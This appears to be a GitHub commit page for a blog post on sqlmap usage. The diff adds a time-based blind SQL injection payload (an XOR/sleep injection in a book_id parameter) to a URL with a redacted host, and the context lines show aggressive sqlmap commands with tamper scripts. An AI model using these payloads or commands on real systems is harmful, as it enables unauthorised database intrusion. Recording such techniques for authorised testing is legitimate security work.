Skip to content

Commit

Permalink
fix text
Browse files Browse the repository at this point in the history
  • Loading branch information
xiaoqiang202010 committed Jul 9, 2024
1 parent 5ae5563 commit 33cd57a
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions _posts/2024/06/2024-06-29-smap-python.md
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,10 @@ python3 sqlmap.py -u "http://m.xxx.com/books/areward?book_id=1&gift_id=1" -p boo
python3 sqlmap.py -u "http://m.xxx.com/books/areward?book_id=1&gift_id=1" -p book_id --dbms=mysql --level=5 --risk=3 --tamper=space2comment.py,between.py --current-db --random-agent --time-sec=10 --batch
```

sql注入
```
http://www.xxx.com/?a=detail&book_id=1590'XOR(159*if(now()=sysdate()%2Csleep(26)%2C0))XOR'Z&replyid=92&s=commit
````
### 漏洞回显
```
Expand Down

0 comments on commit 33cd57a

Please sign in to comment.